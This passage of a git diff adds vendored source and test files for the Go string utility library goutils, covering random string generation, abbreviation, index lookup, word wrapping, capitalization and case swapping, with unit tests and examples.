+*/ +func RandomAlphabetic(count int) (string, error) { + return Random(count, 0, 0, true, false) +} + +/* +RandomAlphaNumeric creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of alpha-numeric characters. + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAlphaNumeric(count int) (string, error) { + RandomString, err := Random(count, 0, 0, true, true) + if err != nil { + return "", fmt.Errorf("Error: %s", err) + } + match, err := regexp.MatchString("([0-9]+)", RandomString) + if err != nil { + panic(err) + } + + if !match { + //Get the position between 0 and the length of the string-1 to insert a random number + position := rand.Intn(count) + //Insert a random number between [0-9] in the position + RandomString = RandomString[:position] + string('0'+rand.Intn(10)) + RandomString[position+1:] + return RandomString, err + } + return RandomString, err + +} + +/* +RandomAlphaNumericCustom creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments. + +Parameters: + count - the length of random string to create + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAlphaNumericCustom(count int, letters bool, numbers bool) (string, error) { + return Random(count, 0, 0, letters, numbers) +} + +/* +Random creates a random string based on a variety of options, using default source of randomness. 
+This method has exactly the same semantics as RandomSeed(int, int, int, bool, bool, []char, *rand.Rand), but +instead of using an externally supplied source of randomness, it uses the internal *rand.Rand instance. + +Parameters: + count - the length of random string to create + start - the position in set of chars (ASCII/Unicode int) to start at + end - the position in set of chars (ASCII/Unicode int) to end before + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars. + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func Random(count int, start int, end int, letters bool, numbers bool, chars ...rune) (string, error) { + return RandomSeed(count, start, end, letters, numbers, chars, RANDOM) +} + +/* +RandomSeed creates a random string based on a variety of options, using supplied source of randomness. +If the parameters start and end are both 0, start and end are set to ' ' and 'z', the ASCII printable characters, will be used, +unless letters and numbers are both false, in which case, start and end are set to 0 and math.MaxInt32, respectively. +If chars is not nil, characters stored in chars that are between start and end are chosen. +This method accepts a user-supplied *rand.Rand instance to use as a source of randomness. By seeding a single *rand.Rand instance +with a fixed seed and using it for each call, the same random sequence of strings can be generated repeatedly and predictably. 
+ +Parameters: + count - the length of random string to create + start - the position in set of chars (ASCII/Unicode decimals) to start at + end - the position in set of chars (ASCII/Unicode decimals) to end before + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars. + random - a source of randomness. + +Returns: + string - the random string + error - an error stemming from invalid parameters: if count < 0; or the provided chars array is empty; or end <= start; or end > len(chars) +*/ +func RandomSeed(count int, start int, end int, letters bool, numbers bool, chars []rune, random *rand.Rand) (string, error) { + + if count == 0 { + return "", nil + } else if count < 0 { + err := fmt.Errorf("randomstringutils illegal argument: Requested random string length %v is less than 0.", count) // equiv to err := errors.New("...") + return "", err + } + if chars != nil && len(chars) == 0 { + err := fmt.Errorf("randomstringutils illegal argument: The chars array must not be empty") + return "", err + } + + if start == 0 && end == 0 { + if chars != nil { + end = len(chars) + } else { + if !letters && !numbers { + end = math.MaxInt32 + } else { + end = 'z' + 1 + start = ' ' + } + } + } else { + if end <= start { + err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) must be greater than start (%v)", end, start) + return "", err + } + + if chars != nil && end > len(chars) { + err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) cannot be greater than len(chars) (%v)", end, len(chars)) + return "", err + } + } + + buffer := make([]rune, count) + gap := end - start + + // high-surrogates range, (\uD800-\uDBFF) = 55296 - 56319 + // low-surrogates range, (\uDC00-\uDFFF) = 56320 - 57343 + + for count != 0 { + count-- + var ch rune + if chars == nil { + ch = 
rune(random.Intn(gap) + start) + } else { + ch = chars[random.Intn(gap)+start] + } + + if letters && unicode.IsLetter(ch) || numbers && unicode.IsDigit(ch) || !letters && !numbers { + if ch >= 56320 && ch <= 57343 { // low surrogate range + if count == 0 { + count++ + } else { + // Insert low surrogate + buffer[count] = ch + count-- + // Insert high surrogate + buffer[count] = rune(55296 + random.Intn(128)) + } + } else if ch >= 55296 && ch <= 56191 { // High surrogates range (Partial) + if count == 0 { + count++ + } else { + // Insert low surrogate + buffer[count] = rune(56320 + random.Intn(128)) + count-- + // Insert high surrogate + buffer[count] = ch + } + } else if ch >= 56192 && ch <= 56319 { + // private high surrogate, skip it + count++ + } else { + // not one of the surrogates* + buffer[count] = ch + } + } else { + count++ + } + } + return string(buffer), nil +} diff --git a/vendor/github.com/aokoli/goutils/randomstringutils_test.go b/vendor/github.com/aokoli/goutils/randomstringutils_test.go new file mode 100644 index 0000000000..b990654a1c --- /dev/null +++ b/vendor/github.com/aokoli/goutils/randomstringutils_test.go @@ -0,0 +1,78 @@ +package goutils + +import ( + "fmt" + "math/rand" + "testing" +) + +// ****************************** TESTS ******************************************** + +func TestRandomSeed(t *testing.T) { + + // count, start, end, letters, numbers := 5, 0, 0, true, true + random := rand.New(rand.NewSource(10)) + out := "3ip9v" + + // Test 1: Simulating RandomAlphaNumeric(count int) + if x, _ := RandomSeed(5, 0, 0, true, true, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, true, nil, random, x, out) + } + + // Test 2: Simulating RandomAlphabetic(count int) + out = "MBrbj" + + if x, _ := RandomSeed(5, 0, 0, true, false, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, false, nil, random, x, out) + } + + // Test 3: 
Simulating RandomNumeric(count int) + out = "88935" + + if x, _ := RandomSeed(5, 0, 0, false, true, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, true, nil, random, x, out) + } + + // Test 4: Simulating RandomAscii(count int) + out = "H_I;E" + + if x, _ := RandomSeed(5, 32, 127, false, false, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 32, 127, false, false, nil, random, x, out) + } + + // Test 5: Simulating RandomSeed(...) with custom chars + chars := []rune{'1', '2', '3', 'a', 'b', 'c'} + out = "2b2ca" + + if x, _ := RandomSeed(5, 0, 0, false, false, chars, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, false, chars, random, x, out) + } + +} + +// ****************************** EXAMPLES ******************************************** + +func ExampleRandomSeed() { + + var seed int64 = 10 // If you change this seed #, the random sequence below will change + random := rand.New(rand.NewSource(seed)) + chars := []rune{'1', '2', '3', 'a', 'b', 'c'} + + rand1, _ := RandomSeed(5, 0, 0, true, true, nil, random) // RandomAlphaNumeric (Alphabets and numbers possible) + rand2, _ := RandomSeed(5, 0, 0, true, false, nil, random) // RandomAlphabetic (Only alphabets) + rand3, _ := RandomSeed(5, 0, 0, false, true, nil, random) // RandomNumeric (Only numbers) + rand4, _ := RandomSeed(5, 32, 127, false, false, nil, random) // RandomAscii (Alphabets, numbers, and other ASCII chars) + rand5, _ := RandomSeed(5, 0, 0, true, true, chars, random) // RandomSeed with custom characters + + fmt.Println(rand1) + fmt.Println(rand2) + fmt.Println(rand3) + fmt.Println(rand4) + fmt.Println(rand5) + // Output: + // 3ip9v + // MBrbj + // 88935 + // H_I;E + // 2b2ca +} diff --git a/vendor/github.com/aokoli/goutils/stringutils.go b/vendor/github.com/aokoli/goutils/stringutils.go new file mode 100644 index 0000000000..5037c4516b --- 
/dev/null +++ b/vendor/github.com/aokoli/goutils/stringutils.go @@ -0,0 +1,224 @@ +/* +Copyright 2014 Alexander Okoli + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package goutils + +import ( + "bytes" + "fmt" + "strings" + "unicode" +) + +// Typically returned by functions where a searched item cannot be found +const INDEX_NOT_FOUND = -1 + +/* +Abbreviate abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "Now is the time for..." + +Specifically, the algorithm is as follows: + + - If str is less than maxWidth characters long, return it. + - Else abbreviate it to (str[0:maxWidth - 3] + "..."). + - If maxWidth is less than 4, return an illegal argument error. + - In no case will it return a string of length greater than maxWidth. + +Parameters: + str - the string to check + maxWidth - maximum length of result string, must be at least 4 + +Returns: + string - abbreviated string + error - if the width is too small +*/ +func Abbreviate(str string, maxWidth int) (string, error) { + return AbbreviateFull(str, 0, maxWidth) +} + +/* +AbbreviateFull abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "...is the time for..." +This function works like Abbreviate(string, int), but allows you to specify a "left edge" offset. 
Note that this left edge is not +necessarily going to be the leftmost character in the result, or the first character following the ellipses, but it will appear +somewhere in the result. +In no case will it return a string of length greater than maxWidth. + +Parameters: + str - the string to check + offset - left edge of source string + maxWidth - maximum length of result string, must be at least 4 + +Returns: + string - abbreviated string + error - if the width is too small +*/ +func AbbreviateFull(str string, offset int, maxWidth int) (string, error) { + if str == "" { + return "", nil + } + if maxWidth < 4 { + err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width is 4") + return "", err + } + if len(str) <= maxWidth { + return str, nil + } + if offset > len(str) { + offset = len(str) + } + if len(str)-offset < (maxWidth - 3) { // 15 - 5 < 10 - 3 = 10 < 7 + offset = len(str) - (maxWidth - 3) + } + abrevMarker := "..." + if offset <= 4 { + return str[0:maxWidth-3] + abrevMarker, nil // str.substring(0, maxWidth - 3) + abrevMarker; + } + if maxWidth < 7 { + err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width with offset is 7") + return "", err + } + if (offset + maxWidth - 3) < len(str) { // 5 + (10-3) < 15 = 12 < 15 + abrevStr, _ := Abbreviate(str[offset:len(str)], (maxWidth - 3)) + return abrevMarker + abrevStr, nil // abrevMarker + abbreviate(str.substring(offset), maxWidth - 3); + } + return abrevMarker + str[(len(str)-(maxWidth-3)):len(str)], nil // abrevMarker + str.substring(str.length() - (maxWidth - 3)); +} + +/* +DeleteWhiteSpace deletes all whitespaces from a string as defined by unicode.IsSpace(rune). +It returns the string without whitespaces. 
+ +Parameter: + str - the string to delete whitespace from, may be nil + +Returns: + the string without whitespaces +*/ +func DeleteWhiteSpace(str string) string { + if str == "" { + return str + } + sz := len(str) + var chs bytes.Buffer + count := 0 + for i := 0; i < sz; i++ { + ch := rune(str[i]) + if !unicode.IsSpace(ch) { + chs.WriteRune(ch) + count++ + } + } + if count == sz { + return str + } + return chs.String() +} + +/* +IndexOfDifference compares two strings, and returns the index at which the strings begin to differ. + +Parameters: + str1 - the first string + str2 - the second string + +Returns: + the index where str1 and str2 begin to differ; -1 if they are equal +*/ +func IndexOfDifference(str1 string, str2 string) int { + if str1 == str2 { + return INDEX_NOT_FOUND + } + if IsEmpty(str1) || IsEmpty(str2) { + return 0 + } + var i int + for i = 0; i < len(str1) && i < len(str2); i++ { + if rune(str1[i]) != rune(str2[i]) { + break + } + } + if i < len(str2) || i < len(str1) { + return i + } + return INDEX_NOT_FOUND +} + +/* +IsBlank checks if a string is whitespace or empty (""). Observe the following behavior: + + goutils.IsBlank("") = true + goutils.IsBlank(" ") = true + goutils.IsBlank("bob") = false + goutils.IsBlank(" bob ") = false + +Parameter: + str - the string to check + +Returns: + true - if the string is whitespace or empty ("") +*/ +func IsBlank(str string) bool { + strLen := len(str) + if str == "" || strLen == 0 { + return true + } + for i := 0; i < strLen; i++ { + if unicode.IsSpace(rune(str[i])) == false { + return false + } + } + return true +} + +/* +IndexOf returns the index of the first instance of sub in str, with the search beginning from the +index start point specified. -1 is returned if sub is not present in str. + +An empty string ("") will return -1 (INDEX_NOT_FOUND). A negative start position is treated as zero. +A start position greater than the string length returns -1. 
+ +Parameters: + str - the string to check + sub - the substring to find + start - the start position; negative treated as zero + +Returns: + the first index where the sub string was found (always >= start) +*/ +func IndexOf(str string, sub string, start int) int { + + if start < 0 { + start = 0 + } + + if len(str) < start { + return INDEX_NOT_FOUND + } + + if IsEmpty(str) || IsEmpty(sub) { + return INDEX_NOT_FOUND + } + + partialIndex := strings.Index(str[start:len(str)], sub) + if partialIndex == -1 { + return INDEX_NOT_FOUND + } + return partialIndex + start +} + +// IsEmpty checks if a string is empty (""). Returns true if empty, and false otherwise. +func IsEmpty(str string) bool { + return len(str) == 0 +} diff --git a/vendor/github.com/aokoli/goutils/stringutils_test.go b/vendor/github.com/aokoli/goutils/stringutils_test.go new file mode 100644 index 0000000000..dae93132a0 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/stringutils_test.go @@ -0,0 +1,309 @@ +package goutils + +import ( + "fmt" + "testing" +) + +// ****************************** TESTS ******************************************** + +func TestAbbreviate(t *testing.T) { + + // Test 1 + in := "abcdefg" + out := "abc..." + maxWidth := 6 + + if x, _ := Abbreviate(in, maxWidth); x != out { + t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out) + } + + // Test 2 + out = "abcdefg" + maxWidth = 7 + + if x, _ := Abbreviate(in, maxWidth); x != out { + t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out) + } + + // Test 3 + out = "a..." + maxWidth = 4 + + if x, _ := Abbreviate(in, maxWidth); x != out { + t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out) + } +} + +func TestAbbreviateFull(t *testing.T) { + + // Test 1 + in := "abcdefghijklmno" + out := "abcdefg..." 
+ offset := -1 + maxWidth := 10 + + if x, _ := AbbreviateFull(in, offset, maxWidth); x != out { + t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out) + } + + // Test 2 + out = "...fghi..." + offset = 5 + maxWidth = 10 + + if x, _ := AbbreviateFull(in, offset, maxWidth); x != out { + t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out) + } + + // Test 3 + out = "...ijklmno" + offset = 12 + maxWidth = 10 + + if x, _ := AbbreviateFull(in, offset, maxWidth); x != out { + t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out) + } +} + +func TestIndexOf(t *testing.T) { + + // Test 1 + str := "abcafgka" + sub := "a" + start := 0 + out := 0 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + + // Test 2 + start = 1 + out = 3 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + + // Test 3 + start = 4 + out = 7 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + + // Test 4 + sub = "z" + out = -1 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + +} + +func TestIsBlank(t *testing.T) { + + // Test 1 + str := "" + out := true + + if x := IsBlank(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } + + // Test 2 + str = " " + out = true + + if x := IsBlank(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } + + // Test 3 + str = " abc " + out = false + + if x := IsBlank(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } +} + +func TestDeleteWhiteSpace(t *testing.T) { + + // Test 1 + str := " a b c " + out := "abc" + + if x := DeleteWhiteSpace(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } + + // Test 
2 + str = " " + out = "" + + if x := DeleteWhiteSpace(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } +} + +func TestIndexOfDifference(t *testing.T) { + + str1 := "abc" + str2 := "a_c" + out := 1 + + if x := IndexOfDifference(str1, str2); x != out { + t.Errorf("IndexOfDifference(%v, %v) = %v, want %v", str1, str2, x, out) + } +} + +// ****************************** EXAMPLES ******************************************** + +func ExampleAbbreviate() { + + str := "abcdefg" + out1, _ := Abbreviate(str, 6) + out2, _ := Abbreviate(str, 7) + out3, _ := Abbreviate(str, 8) + out4, _ := Abbreviate(str, 4) + _, err1 := Abbreviate(str, 3) + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + fmt.Println(err1) + // Output: + // abc... + // abcdefg + // abcdefg + // a... + // stringutils illegal argument: Minimum abbreviation width is 4 +} + +func ExampleAbbreviateFull() { + + str := "abcdefghijklmno" + str2 := "abcdefghij" + out1, _ := AbbreviateFull(str, -1, 10) + out2, _ := AbbreviateFull(str, 0, 10) + out3, _ := AbbreviateFull(str, 1, 10) + out4, _ := AbbreviateFull(str, 4, 10) + out5, _ := AbbreviateFull(str, 5, 10) + out6, _ := AbbreviateFull(str, 6, 10) + out7, _ := AbbreviateFull(str, 8, 10) + out8, _ := AbbreviateFull(str, 10, 10) + out9, _ := AbbreviateFull(str, 12, 10) + _, err1 := AbbreviateFull(str2, 0, 3) + _, err2 := AbbreviateFull(str2, 5, 6) + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + fmt.Println(out5) + fmt.Println(out6) + fmt.Println(out7) + fmt.Println(out8) + fmt.Println(out9) + fmt.Println(err1) + fmt.Println(err2) + // Output: + // abcdefg... + // abcdefg... + // abcdefg... + // abcdefg... + // ...fghi... + // ...ghij... 
+ // ...ijklmno + // ...ijklmno + // ...ijklmno + // stringutils illegal argument: Minimum abbreviation width is 4 + // stringutils illegal argument: Minimum abbreviation width with offset is 7 +} + +func ExampleIsBlank() { + + out1 := IsBlank("") + out2 := IsBlank(" ") + out3 := IsBlank("bob") + out4 := IsBlank(" bob ") + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + // Output: + // true + // true + // false + // false +} + +func ExampleDeleteWhiteSpace() { + + out1 := DeleteWhiteSpace(" ") + out2 := DeleteWhiteSpace("bob") + out3 := DeleteWhiteSpace("bob ") + out4 := DeleteWhiteSpace(" b o b ") + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + // Output: + // + // bob + // bob + // bob +} + +func ExampleIndexOf() { + + str := "abcdefgehije" + out1 := IndexOf(str, "e", 0) + out2 := IndexOf(str, "e", 5) + out3 := IndexOf(str, "e", 8) + out4 := IndexOf(str, "eh", 0) + out5 := IndexOf(str, "eh", 22) + out6 := IndexOf(str, "z", 0) + out7 := IndexOf(str, "", 0) + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + fmt.Println(out5) + fmt.Println(out6) + fmt.Println(out7) + // Output: + // 4 + // 7 + // 11 + // 7 + // -1 + // -1 + // -1 +} + +func ExampleIndexOfDifference() { + + out1 := IndexOfDifference("abc", "abc") + out2 := IndexOfDifference("ab", "abxyz") + out3 := IndexOfDifference("", "abc") + out4 := IndexOfDifference("abcde", "abxyz") + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + // Output: + // -1 + // 2 + // 0 + // 2 +} diff --git a/vendor/github.com/aokoli/goutils/wordutils.go b/vendor/github.com/aokoli/goutils/wordutils.go new file mode 100644 index 0000000000..e92dd39900 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/wordutils.go @@ -0,0 +1,356 @@ +/* +Copyright 2014 Alexander Okoli + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. 
+You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +/* +Package goutils provides utility functions to manipulate strings in various ways. +The code snippets below show examples of how to use goutils. Some functions return +errors while others do not, so usage would vary as a result. + +Example: + + package main + + import ( + "fmt" + "github.com/aokoli/goutils" + ) + + func main() { + + // EXAMPLE 1: A goutils function which returns no errors + fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF" + + + + // EXAMPLE 2: A goutils function which returns an error + rand1, err1 := goutils.Random (-1, 0, 0, true, true) + + if err1 != nil { + fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...) + } else { + fmt.Println(rand1) + } + } +*/ +package goutils + +import ( + "bytes" + "strings" + "unicode" +) + +// VERSION indicates the current version of goutils +const VERSION = "1.0.0" + +/* +Wrap wraps a single line of text, identifying words by ' '. +New lines will be separated by '\n'. Very long words, such as URLs will not be wrapped. +Leading spaces on a new line are stripped. Trailing spaces are not stripped. + +Parameters: + str - the string to be word wrapped + wrapLength - the column (a column can fit only one character) to wrap the words at, less than 1 is treated as 1 + +Returns: + a line with newlines inserted +*/ +func Wrap(str string, wrapLength int) string { + return WrapCustom(str, wrapLength, "", false) +} + +/* +WrapCustom wraps a single line of text, identifying words by ' '. +Leading spaces on a new line are stripped. 
Trailing spaces are not stripped. + +Parameters: + str - the string to be word wrapped + wrapLength - the column number (a column can fit only one character) to wrap the words at, less than 1 is treated as 1 + newLineStr - the string to insert for a new line, "" uses '\n' + wrapLongWords - true if long words (such as URLs) should be wrapped + +Returns: + a line with newlines inserted +*/ +func WrapCustom(str string, wrapLength int, newLineStr string, wrapLongWords bool) string { + + if str == "" { + return "" + } + if newLineStr == "" { + newLineStr = "\n" // TODO Assumes "\n" is seperator. Explore SystemUtils.LINE_SEPARATOR from Apache Commons + } + if wrapLength < 1 { + wrapLength = 1 + } + + inputLineLength := len(str) + offset := 0 + + var wrappedLine bytes.Buffer + + for inputLineLength-offset > wrapLength { + + if rune(str[offset]) == ' ' { + offset++ + continue + } + + end := wrapLength + offset + 1 + spaceToWrapAt := strings.LastIndex(str[offset:end], " ") + offset + + if spaceToWrapAt >= offset { + // normal word (not longer than wrapLength) + wrappedLine.WriteString(str[offset:spaceToWrapAt]) + wrappedLine.WriteString(newLineStr) + offset = spaceToWrapAt + 1 + + } else { + // long word or URL + if wrapLongWords { + end := wrapLength + offset + // long words are wrapped one line at a time + wrappedLine.WriteString(str[offset:end]) + wrappedLine.WriteString(newLineStr) + offset += wrapLength + } else { + // long words aren't wrapped, just extended beyond limit + end := wrapLength + offset + spaceToWrapAt = strings.IndexRune(str[end:len(str)], ' ') + end + if spaceToWrapAt >= 0 { + wrappedLine.WriteString(str[offset:spaceToWrapAt]) + wrappedLine.WriteString(newLineStr) + offset = spaceToWrapAt + 1 + } else { + wrappedLine.WriteString(str[offset:len(str)]) + offset = inputLineLength + } + } + } + } + + wrappedLine.WriteString(str[offset:len(str)]) + + return wrappedLine.String() + +} + +/* +Capitalize capitalizes all the delimiter separated words in a string. 
Only the first letter of each word is changed. +To convert the rest of each word to lowercase at the same time, use CapitalizeFully(str string, delimiters ...rune). +The delimiters represent a set of characters understood to separate words. The first string character +and the first non-delimiter character after a delimiter will be capitalized. A "" input string returns "". +Capitalization uses the Unicode title case, normally equivalent to upper case. + +Parameters: + str - the string to capitalize + delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter + +Returns: + capitalized string +*/ +func Capitalize(str string, delimiters ...rune) string { + + var delimLen int + + if delimiters == nil { + delimLen = -1 + } else { + delimLen = len(delimiters) + } + + if str == "" || delimLen == 0 { + return str + } + + buffer := []rune(str) + capitalizeNext := true + for i := 0; i < len(buffer); i++ { + ch := buffer[i] + if isDelimiter(ch, delimiters...) { + capitalizeNext = true + } else if capitalizeNext { + buffer[i] = unicode.ToTitle(ch) + capitalizeNext = false + } + } + return string(buffer) + +} + +/* +CapitalizeFully converts all the delimiter separated words in a string into capitalized words, that is each word is made up of a +titlecase character and then a series of lowercase characters. The delimiters represent a set of characters understood +to separate words. The first string character and the first non-delimiter character after a delimiter will be capitalized. +Capitalization uses the Unicode title case, normally equivalent to upper case. 
+ +Parameters: + str - the string to capitalize fully + delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter + +Returns: + capitalized string +*/ +func CapitalizeFully(str string, delimiters ...rune) string { + + var delimLen int + + if delimiters == nil { + delimLen = -1 + } else { + delimLen = len(delimiters) + } + + if str == "" || delimLen == 0 { + return str + } + str = strings.ToLower(str) + return Capitalize(str, delimiters...) +} + +/* +Uncapitalize uncapitalizes all the whitespace separated words in a string. Only the first letter of each word is changed. +The delimiters represent a set of characters understood to separate words. The first string character and the first non-delimiter +character after a delimiter will be uncapitalized. Whitespace is defined by unicode.IsSpace(char). + +Parameters: + str - the string to uncapitalize fully + delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter + +Returns: + uncapitalized string +*/ +func Uncapitalize(str string, delimiters ...rune) string { + + var delimLen int + + if delimiters == nil { + delimLen = -1 + } else { + delimLen = len(delimiters) + } + + if str == "" || delimLen == 0 { + return str + } + + buffer := []rune(str) + uncapitalizeNext := true // TODO Always makes capitalize/un apply to first char. + for i := 0; i < len(buffer); i++ { + ch := buffer[i] + if isDelimiter(ch, delimiters...) { + uncapitalizeNext = true + } else if uncapitalizeNext { + buffer[i] = unicode.ToLower(ch) + uncapitalizeNext = false + } + } + return string(buffer) +} + +/* +SwapCase swaps the case of a string using a word based algorithm. 
/*
SwapCase swaps the case of a string using a word based algorithm.

Conversion algorithm:

    Upper case character converts to Lower case
    Title case character converts to Lower case
    Lower case character after Whitespace or at start converts to Title case
    Other Lower case character converts to Upper case
    Whitespace is defined by unicode.IsSpace(char).

Parameters:
    str - the string to swap case

Returns:
    the changed string
*/
func SwapCase(str string) string {
	if str == "" {
		return str
	}
	buffer := []rune(str)

	// True at the start of the string and right after any whitespace rune; a
	// lowercase rune in that position becomes title case instead of upper.
	whitespace := true

	// Idiom fix: range over the runes instead of a C-style index loop, and
	// merge the Upper/Title branches, which had identical bodies.
	for i, ch := range buffer {
		switch {
		case unicode.IsUpper(ch) || unicode.IsTitle(ch):
			buffer[i] = unicode.ToLower(ch)
			whitespace = false
		case unicode.IsLower(ch):
			if whitespace {
				buffer[i] = unicode.ToTitle(ch)
				whitespace = false
			} else {
				buffer[i] = unicode.ToUpper(ch)
			}
		default:
			// Caseless rune: only its whitespace-ness matters.
			whitespace = unicode.IsSpace(ch)
		}
	}
	return string(buffer)
}
/*
Initials extracts the initial letters from each word in the string. The first
letter of the string and all first letters after the defined delimiters are
returned as a new string. Their case is not changed. If the delimiters
parameter is excluded, then Whitespace is used. Whitespace is defined by
unicode.IsSpace(char). An empty delimiter array returns an empty string.

Parameters:
    str - the string to get initials from
    delimiters - set of characters to determine words, exclusion of this parameter means whitespace would be delimiter

Returns:
    string of initial letters
*/
func Initials(str string, delimiters ...rune) string {
	if str == "" {
		return str
	}
	// A non-nil but empty delimiter set means "no words at all".
	if delimiters != nil && len(delimiters) == 0 {
		return ""
	}

	// BUG FIX: the original indexed the string byte-by-byte (rune(str[i])),
	// which corrupts multi-byte UTF-8 runes. Ranging over the string decodes
	// whole runes; behavior for ASCII input is unchanged.
	var buf bytes.Buffer
	lastWasGap := true
	for _, ch := range str {
		if isDelimiter(ch, delimiters...) {
			lastWasGap = true
		} else if lastWasGap {
			buf.WriteRune(ch)
			lastWasGap = false
		}
	}
	return buf.String()
}

// isDelimiter reports whether ch is one of delimiters; a nil delimiter set
// means "any Unicode whitespace".
func isDelimiter(ch rune, delimiters ...rune) bool {
	if delimiters == nil {
		return unicode.IsSpace(ch)
	}
	for _, delimiter := range delimiters {
		if ch == delimiter {
			return true
		}
	}
	return false
}
with both parameters, with param 2 containing whitespace and '.' + out = "Test Is Going.Well.Thank.You.For Inquiring" + delimiters := []rune{' ', '.'} + + if x := Capitalize(in, delimiters...); x != out { + t.Errorf("Capitalize(%v) = %v, want %v", in, x, out) + } +} + +func TestCapitalizeFully(t *testing.T) { + + // Test 1 + in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" + out := "Test Is Going.well.thank.you.for Inquiring" + + if x := CapitalizeFully(in); x != out { + t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out) + } + + // Test 2 + out = "Test Is Going.Well.Thank.You.For Inquiring" + delimiters := []rune{' ', '.'} + + if x := CapitalizeFully(in, delimiters...); x != out { + t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out) + } +} + +func TestUncapitalize(t *testing.T) { + + // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter + in := "This Is A.Test" + out := "this is a.Test" + + if x := Uncapitalize(in); x != out { + t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out) + } + + // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.' 
